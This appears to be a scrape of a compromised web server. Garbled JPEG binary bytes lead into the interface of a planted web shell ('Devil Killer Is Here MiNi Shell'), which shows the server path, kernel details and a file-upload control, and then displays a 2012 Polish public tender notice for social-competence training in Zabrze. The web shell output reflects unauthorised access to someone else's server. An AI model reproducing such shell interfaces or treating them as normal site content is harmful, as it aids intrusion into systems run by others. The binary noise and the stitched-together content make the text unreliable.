JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120327/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120327/95180-N-2012.html

<p class="kh_header"><b>Zabrze: Wyjazdowy oraz stacjonarny trening kompetencji i umiejętności społecznych dla uczestników projektu  Reintegracja. Aktywność. Praca. Program na rzecz integracji społeczno-zawodowej w gminie Zabrze współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego.</b><br>
<b>Numer ogłoszenia: 95180 - 2012; data zamieszczenia: 27.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Rodzinie , ul. Roosevelta 40, 41-800 Zabrze, woj. śląskie, tel. 032 2777800, faks 032 2777802.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mopr.zabrze.pl.pl,www.zabrze.magistrat.pl/zakładka opieka społeczna/mopr/zamówienia publiczne</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wyjazdowy oraz stacjonarny trening kompetencji i umiejętności społecznych dla uczestników projektu  Reintegracja. Aktywność. Praca. Program na rzecz integracji społeczno-zawodowej w gminie Zabrze współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> organizacja i przeprowadzenie wyjazdowego oraz stacjonarnego treningu kompetencji i umiejętności społecznych dla uczestników projektu Reintegracja. Aktywność. Praca. Program na rzecz integracji społeczno-zawodowej w gminie Zabrze.
AUCZESTNICY:
Liczba uczestników: W treningu weźmie udział od 30 do 80 uczestników/uczestniczek projektu systemowego .
Ze względu na dużą liczbę osób trening powinien być zrealizowany w dwóch grupach uczestników/uczestniczek, 
w dwóch  różnych terminach, dopuszcza się realizację w różnych obiektach. 
Liczba dzieci wymagających opieki podczas zajęć rodzica:  od 30 do 80 (w wieku od 0 do 17 lat) , w n/w grupach wiekowych:
Grupa najmłodsza tj. dzieci w wieku ( 0-3)
Grupa przedszkolna tj. dzieci w wieku (4- 6)
Grupa wczesnoszkolna tj. dzieci w wieku (7 - 11)
Grupa szkolna tj. dzieci w wieku (12 - 17)
Opieka winna być sprawowana w sposób dostosowany do wieku dzieci  i sprawowana przez doświadczoną kadrę.
Dzieci uczestników/uczestniczek treningu będą miały zapewnione zakwaterowanie z rodzicem/opiekunem oraz wyżywienie(po ? porcji). Dzieci powinny mieć zapewnione dodatkowe atrakcje przy uwzględnieniu warunków atmosferycznych (zabawy ruchowe na powietrzu, spacer, zajęcia plastyczne, ruchowe na terenie ośrodka). Opieka nad dziećmi powinna być zapewniona zarówno w trakcie modułu wyjazdowego jak i stacjonarnego.
Zamawiający wymaga minimalnie 1 opiekunki na 5 dzieci. W sytuacji gdy liczba uczestniczących w wyjeździe dzieci w poszczególnych grupach nie przekroczy 3 dzieci istnieje możliwość połączenia grup za zgodą Zamawiającego oraz rotacji opiekunek pomiędzy grupami.
W przypadku gdy wystąpi okoliczność, że zbędnym lub niemożliwym stanie się przeprowadzenie treningu dla liczby osób wskazanych w SIWZ, Zamawiający zastrzega sobie prawo zmniejszenia liczby osób skierowanych na trening.
BTEMATYKA I CEL:
Zakres tematyczny: Trening ma umożliwić w szczególności rozwijanie kompetencji społecznych w zakresie: 
- podejmowania decyzji, 
- radzenia sobie ze złością i agresją, 
- wykształcenia prawidłowych zasad komunikacji, 
- budowanie właściwego wizerunku swojej osoby, 
- budowanie otwartości na ludzi, zdolności empatii,
- zwiększenie motywacji do wprowadzania satysfakcjonujących zmian osobistych i samokształcenia,
Cel zajęć:
- zwiększenie sprawności w radzeniu sobie z trudnymi sytuacjami,
- uruchamianie i rozwijanie własnych zasobów oraz zwiększanie samoświadomości.
Zagadnienia programowe z zakresu psychoedukacji:
- techniki radzenia sobie ze stresem (autogenna i progresywna relaksacja, wizualizacja),
-budowanie pewności siebie,
- trening asertywności,
- trening funkcji poznawczych,
- budowanie indywidualnej hierarchii wartości.
CFORMA I CZAS TRWANIA:
Trening ma się składać z dwóch modułów wyjazdowych i dwóch modułów stacjonarnych realizowanych w cyklu: moduł wyjazdowy (od piątku popołudnia do niedzieli wieczorem), moduł stacjonarny (sobota), moduł stacjonarny (sobota), moduł wyjazdowy (od piątku popołudnia do niedzieli wieczorem) :
Moduł wyjazdowy - obejmujący dwa wyjazdy po 15 godzin treningowych każde, prowadzone przez trenera grupy, psychologa lub psychoterapeutę
Moduł stacjonarny obejmujący 2 spotkania po 4 godziny treningowe każde prowadzone przez trenera grupy, psychologa lub psychoterapeutę
Liczba godzin zajęć:  38 godzin zajęć treningowych zgodnych z zatwierdzonym harmonogramem. 
Przez 1 godzinę treningową Zamawiający rozumie 45 minut .
-  zajęcia powinny odbywać się w maksymalnie 15-osobowej grupie treningowej
-  każda z grup powinna mieć zapewnionego trenera grupy, psychologa lub psychoterapeutę.
DTERMIN:
Termin realizacji: Treningi powinny rozpocząć się po 13.05.2012. Ich zakończenie powinno nastąpić do 26.10.2012r.
Termin każdego wyjazdu zostanie indywidualnie ustalony z pracownikiem MOPR.
EKADRA ZAPEWNIANA PRZEZ WYKONAWCĘ:
e.1 Kierownik - opiekun wyjazdu. Zadaniem kierownika/opiekuna będzie m.in. organizacja czasu wolnego i wypoczynku, zapewnienie bezpieczeństwa uczestników/uczestniczek, prowadzenie rozmów, ewentualne załatwianie problemów z Ośrodkiem typu organizacyjnego. Kierownik musi koordynować wyjazd  z Zabrza do miejsca pobytu i z powrotem poprzez rozmieszczenie osób w autokarze, opiekę podczas jazdy i postojów.
Wymagana ilość - 1 kierownik-opiekun  na każdą grupę wyjazdową
e.2 Trener/Psycholog lub Psychoterapeuta - do prowadzenia zajęć w zakresie treningu kompetencji i umiejętności społecznych  w liczbie umożliwiającej przeprowadzenie zajęć w grupach maksymalnie 15-osobowych.
Wymagana ilość -minimum 2 - maksymalnie 6 na każdą grupę wyjazdową
e.3 Opiekun/Opiekunka w liczbie umożliwiającej zapewnienie opieki zgodnie z wymaganiami Zamawiającego.
Wymagana ilość -minimum 6 - maksymalnie 8 na każdą grupę wyjazdową. 
Zamawiający dopuszcza możliwość przesunięć między poszczególnymi grupami wiekowymi w zakresie opieki.
FMIEJSCE:
MODUŁ WYJAZDOWY  - wyjazdy odbędą się w Ustroniu lub Korbielowie lub Wiśle (na warunkach określonych z Zamawiającym) zgodnie z uzgodnionym minimum 7 dni roboczych przed wyjazdem  harmonogramem. 
MODUŁ STACJONARNY -sala szkoleniowa w centrum Zabrza.
GWARUNKI SZKOLENIOWE i ZAKWATEROWANIA:
G.1 SALA/E SZKOLENIOWA/E - Wykonawca zobowiązany jest do zapewnienia podczas zajęć wyjazdowych i stacjonarnych wyposażenia dydaktycznego, odpowiadającego obowiązującemu stanowi prawnemu i poziomowi techniki oraz do udostępnienia uczestnikom/uczestniczkom wszelkich materiałów szkoleniowych niezbędnych do przeprowadzenia treningu. Pomieszczenia będą  dostosowane do prowadzenia zajęć i odpowiednio w tym celu wyposażone.
G.2  OŚRODEK - Moduły wyjazdowe winny być realizowane w komfortowym Ośrodku z jadłodajnią, salami do realizacji zajęć oraz miejscem do spędzania wolnego czasu przez uczestników/uczestniczki w ramach zajęć integracyjnych. Powinno też być zapewnione miejsce do zabaw i spędzania czasu dla dzieci. Ośrodek nie może być pensjonatem, kwaterą, gospodarstwem agroturystycznym itp.
Zakwaterowanie powinno być zapewnione w pokojach 2-3 osobowych z łazienkami, dostępem do TV w każdym pokoju. Uczestnicy/uczestniczki powinni zostać zakwaterowani ze względu na płeć oraz razem z dziećmi,  a w przypadku nieparzystej liczby osób zapewniony zostanie dodatkowo pokój jednoosobowy. Rodziny wielodzietnie powinny zostać zakwaterowane razem lub, jeżeli nie ma takiej możliwości, w pokojach obok siebie. W pokojach powinna być zagwarantowana dobrej jakości  woda mineralna gazowana i niegazowana w butelkach w ilości 1 l na osobę przebywającą w pokoju - każdego dnia pobytu.
UWAGA:
Zajęcia treningowe, zakwaterowanie, wyżywienie oraz sprawowanie opieki nad dziećmi musi  być zapewnione w ramach jednego obiektu.
HMATERIAŁY SZKOLENIOWE:
Zostaną wydane uczestnikom/uczestniczkom na własność. Zawierać będą materiały szkoleniowe w formie papierowej, złożone  w komplety w osobnej - teczce z gumką oraz z długopisem typu zenit, a także notatnikiem a-4 ok.50 stronnicowym
ICZAS WOLNY-ZAJĘCIA INTEGRACYJNE PODCZAS WYJAZDÓW
Wykonawca zorganizuje czas wolny od zajęć uczestnikom/uczestniczkom oraz dzieciom w sposób atrakcyjny tj. zapewni  1 wieczór integracyjny z muzyką na żywo, ogniskiem/grillem, zabawami i konkursami, a w przypadku nie sprzyjających warunków atmosferycznych alternatywną formę integracji. Nagrody do kwoty(ok.20zł za 1-sze miejsce,ok.15 zł za drugie miejsce,ok.10 zł za 3 miejsce) zapewni Wykonawca  - w liczbie 3 konkursów dla dorosłych i 3 dla dzieci.
JWYŻYWIENIE PODSTAWOWE 
WYJAZD
Wykonawca zapewnieni 3 pełne posiłki  tj.:
śniadanie w formie szwedzkiego stołu np. ( pieczywo, jajka, dżemy, wędliny-różne rodzaje, sery, jogurty, kiełbaski na ciepło, warzywa i owoce sezonowe, ciepłe napoje  itp., ), 
obiad - dwudaniowy składający się z zupy ok. 500ml na osobę, sztuka mięsa ok.200g, ziemniaki/frytki/ ryż itp. oraz sałatka/surówka, napoje(sok, kompot, woda) oraz deser (budyń/drożdżówka/lody/ciasto itp.), 
kolacja -na ciepło np. fasolka, bogracz, bigos, grochówka /gulasz itp.  z pieczywem i napojami gorącymi. 
W dniu wieczoru  integracyjnego Wykonawca nie zapewnia kolacji zamiast której serwuje kiełbasę z grilla ok. 200gr. na osobę, pieczywo, napoje (soki, woda) i inne dodatki typu ogórek, smalec itp., a także musztardę i keczup.
suchy prowiant  w dniach wyjazdu/przyjazdu suchy prowiant dla dorosłych i dzieci tj. bułka z serem, szynką, pomidorem lub ogórkiem, owoc, napój ze słomką dla dzieci, dla dorosłych 0,5l dobrej jakości wody niegazowanej mineralnej. 
drobny poczęstunek -  stały dostęp do  kawy i herbaty dobrej jakości oraz  kruche ciastka, paluszki, krakersy itp. wyłożone na stołach ze stałym dostępem w trakcie trwania zajęć oraz drobnego poczęstunku  oraz napoje-soki dla dzieci.
UWAGA: wszystkie posiłki mają być podane uczestnikom i dzieciom (1/2 porcji)
ZAJĘCIA STACJONARNE
w trakcie modułu stacjonarnego Wykonawca zapewnieni 1 posiłek serwowany w formie jednodaniowego obiadu podanego w hermetycznych-indywidualnie zapakowanych pojemnikach ze sztućcami jednorazowymi oraz napojem ze słomką ok. 200ml w skład którego wchodzić będzie sztuka mięsa ok.200g, ziemniaki/frytki/ ryż itp. oraz sałatka/surówka oraz w trakcie trwania zajęć drobny poczęstunek tj.  stały dostęp do  kawy i herbaty dobrej jakości oraz  kruche ciastka, paluszki, krakersy itp. wyłożone na stołach ze stałym dostępem w trakcie trwania zajęć oraz drobnego poczęstunku  oraz napoi-soków dla dzieci.
UWAGA: obiad ma być podany uczestnikom i dzieciom (1/2 porcji)
KTRANSPORT:
Wykonawca zapewni dojazd i powrót uczestników i dzieci na trening stacjonarny (bilety na komunikację miejską) , a także dojazd z miejsca zamieszkania i powrót do miejsca zamieszkania (bilety na komunikację miejską) na wcześniej umówione miejsce zbiórki treningu wyjazdowego, z którego nastąpi wyjazd (wyjazd nastąpi w piątek w godzinach popołudniowych; przyjazd powinien nastąpić w niedzielę w godzinach wieczornych) luksusowym autokarem  wyposażonym w odpowiednią do ilości grupy wyjazdowej miejsc siedzących. 
LPOSTANOWIENIA DODATKOWE:
l.1zapewnienie ubezpieczenia NNW, każdego uczestnika/uczestniczki treningu oraz dzieci podczas wyjazdu i na zajęciach stacjonarnych na kwotę 10000,00 zł/1 osobę;
l.2 zapewnienie oznakowania pomieszczeń w których będą odbywały się zajęcia oraz wszelkich dokumentów związanych z realizacją treningu oraz na materiałach przekazywanych uczestnikom/uczestniczkom w trakcie zajęć;
l.3.przedstawienie szczegółowego programu  treningu który musi zawierać zagadnienia opisane w przedmiocie zamówienia i winien być przedstawiony Zamawiającemu do akceptacji przed realizacją treningu w terminie 7 dni roboczych przed planowanym terminem wyjazdu. Powinny się tam znaleźć: miejsce realizacji (dokładny adres), nazwa treningu, czas trwania i sposób organizacji zajęć, cel treningu, plan treningu zawierający nazwę zajęć oraz ich wymiar zgodny z zamówieniem;
l.4 zapewnienie po zakończeniu treningu zaświadczenia o ukończeniu treningu kompetencji i umiejętności społecznych wraz z informacją o współfinansowaniu projektu przez Unię Europejską ze środków Europejskiego Funduszu Społecznego pt. Reintegracja, Aktywność, Praca. Program na rzecz integracji społeczno-zawodowej w gminie Zabrze poprzez wydanie go uczestnikom. Zaliczenie treningu przez  uczestnika/uczestniczkę projektu oznacza otrzymanie zaświadczenia o zakończeniu treningu i wymaga obecności na obu wyjazdach i obu zajęciach stacjonarnych. Zamawiający dopuszcza możliwość otrzymania przez uczestnika/uczestniczkę zaświadczenia o ukończeniu treningu w zakresie realizacji minimum 75% programu treningowego, a poniżej tej granicy uczestnik/uczestniczka otrzyma potwierdzenie uczestnictwa w danej części treningu.
l.5 zapewnienie bezpłatnego pobytu koordynatora grupy w pokoju 1 -osobowym z łazienką na każdą grupę wyjazdową
l.6 zamawiający dopuszcza realizację wyjazdów w różnych ośrodkach wypoczynkowych oraz miejscowościach i salach szkoleniowych z zastrzeżeniem, iż wyjazdy odbywać się będą w ośrodkach o zbliżonym standardzie  świadczonych usług lub lepszych;
l.7 zamawiający ze względu na specyfikę przedmiotu zamówienia nie jest w stanie dokładnie sprecyzować ilości uczestników/uczestniczek treningu i ich dzieci mogących wziąć w nim udział. Zamawiający winien dokonać kalkulacji zgodnie z podanymi ramami ilościowymi uczestników/uczestniczek i dzieci( dotyczy to także liczby potrzebnych trenerów i opiekunów).
l. 8 opłata klimatyczna - Wykonawca uwzględni w cenie oferty opłatę klimatyczną dla wszystkich biorących udział w wyjeździe jeśli jej naliczanie związane jest z miejscem pobytu.
MZAPŁATA FAKTURY
Zamawiający zapłaci za zgłoszonych pisemnie uczestników/uczestniczki wyjazdu , którzy ukończyli pełen trening Zamawiający dopuszcza zrealizowanie płatności za uczestnika, który ukończył poszczególne części/moduły treningowe proporcjonalnie do ilości zrealizowanych części. Faktura zrealizowana będzie po realizacji całego treningu obejmującego 2 moduły wyjazdowe i 2 moduły stacjonarne. Zamawiający nie dopuszcza możliwości płatności częściowej.
N) PROMOCJA/OZNAKOWANIE/DOKUMENTACJA
Wykonawcy zobowiązani są do: 
n.1. promowania Unii Europejskiej, Europejskiego Funduszu Społecznego oraz Programu Operacyjnego Kapitał Ludzki między innymi poprzez umieszczenie w miejscu odbywania treningu, na dokumentacji dotyczącej przebiegu realizacji treningu, na materiałach szkoleniowych oraz przedmiotach niezbędnych do realizacji przedmiotu umowy w sprawie zamówienia informacji Trening realizowany na potrzeby  projektu współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego pt. Reintegracja, Aktywność, Praca. Program na rzecz integracji społeczno-zawodowej w gminie Zabrze  oraz oznaczenia logo EFS, Unii Europejskiej i logo PO KL zgodnie z zasadą wizualizacji dostępną na stronie www.efs.silesia-region.pl w zakładce promocja;
n.2. wykonawca w ramach treningu zobowiązuje się do prowadzenia pełnej dokumentacji z przebiegu treningu, obejmującej dla każdego treningu:
a.	program treningu;
b.	prowadzenie kart przeprowadzonych zajęć (zawierających listę obecności, wymiar godzin i tematy zajęć edukacyjnych);
c.	potwierdzenie otrzymania cateringu (z podziałem na dni) 
d.	rejestr wydanych zaświadczeń potwierdzających ukończenie treningu
Powyższe dokumenty oryginały/kopie Wykonawca przekaże Zamawiającemu w celu potwierdzenia przeprowadzenia treningu. Ponadto Wykonawca dokona archiwizacji w/w dokumentów na okres do 31.12.2020r., zapewniając dostęp do przechowywanej dokumentacji w ramach kontroli wykonania przedmiotu zamówienia. Wszystkie dokumenty sporządzane przez Wykonawcę będą opatrzone logotypami projektu systemowego;
n.3.umieszczać logo POKL, logo EFS, emblemat Unii Europejskiej oraz informację o tym, iż dany trening odbywa się w ramach projektu systemowego współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego związanych z realizacją przedmiotu zamówienia.
n.4. W miejscu organizacji treningu (moduły wyjazdowe i stacjonarne) oraz na materiałach dydaktycznych umieszczać logo POKL, logo EFS, emblematu Unii Europejskiej oraz informacji o tym, iż trening odbywa się w ramach projektu systemowego współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego (obowiązujące logotypy dostępne są na stronie http://efs.silesia-region.pl).
n.5. W/w informacje muszą zawierać :
a.	znak Kapitał Ludzki Narodowa Strategia Spójności 
b.	flagę Unii Europejskiej Europejski Fundusz Społeczny
c.	z tyłu pełną nazwę projektu i informację o współfinansowaniu:
Reintegracja, Aktywność, Praca. Program na  rzecz integracji
społeczno-zawodowej w gminie Zabrze.
Projekt współfinansowany przez Unię Europejską w ramach
Europejskiego Funduszu Społecznego
n.6.Wydać uczestnikowi/uczestniczce oryginał zaświadczenia/poświadczenie o ukończeniu treningu zawierającego informację o realizowaniu treningu w ramach projektu systemowego współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego, kopię w/w zaświadczenia Wykonawca zobowiązuje się wydać Zamawiającemu. Jeżeli nie ma możliwości zamieszczenia odpowiedniej informacji na zaświadczeniu -  wydać dodatkowe zaświadczenie zawierające wskazaną informację.
n.7. Przekazać Zamawiającemu po zakończeniu treningu wszelkie dokumenty oryginały/kopie w celu potwierdzenia realizacji przedmiotu umowy;.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 85.70.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 26.10.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie wpisu do rejestru instytucji szkoleniowych oraz oświadczenia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie wykazu usług oraz oświadczenia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia oraz wykazu</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia oraz zaświadczenia z urzędu skarbowego</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>pełnomocnictwo
parafowany wzór umowy
oferta cenowa</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

